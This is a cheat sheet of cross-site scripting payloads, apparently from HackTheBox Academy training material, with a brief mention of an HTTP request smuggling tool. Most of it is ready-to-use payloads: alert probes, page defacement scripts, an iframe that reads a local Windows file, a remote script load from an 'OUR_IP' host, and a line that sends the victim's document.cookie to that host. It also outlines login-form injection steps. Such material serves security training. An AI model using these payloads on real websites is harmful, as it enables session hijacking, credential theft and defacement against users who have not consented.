Part 1

Tools like smuggler.py (Python) can be used to identify potential HTTP request smuggling vulnerabilities.

Code
Description

<script>alert(window.origin)</script>

Basic XSS Payload

<plaintext>

Basic XSS Payload

<script>print()</script>

Basic XSS Payload

<img src="" onerror=alert(window.origin)>

HTML-based XSS Payload

<script>document.body.style.background = "#141d2b"</script>

Change Background Color

<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

Change Background Image

<script>document.title = 'HackTheBox Academy'</script>

Change Website Title

<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>

Overwrite website's main body

<script>document.getElementById('urlform').remove();</script>

Remove certain HTML element

<script src="http://OUR_IP/script.js"></script>

Load remote script

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

Send Cookie details to us

<iframe src=file:///C:/windows/win.ini>

Load remote ini file via iframe tag

Login Form Injection

curl -isk "https://site.com"

Test for status of Content Security Policy

Serve XSS 𝙥𝙖𝙮𝙡𝙤𝙖𝙙 from a XML file

<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>

Sample XSS Polyglot

How to perform basic Login Form Injection via Reflected XSS

Step 1: Test vulnerable form for the remove function by running script in console (Dev-Tools)

Step 2: Inject form into webpage with XSS payload by executing the below script into console (Dev-tools)

Last updated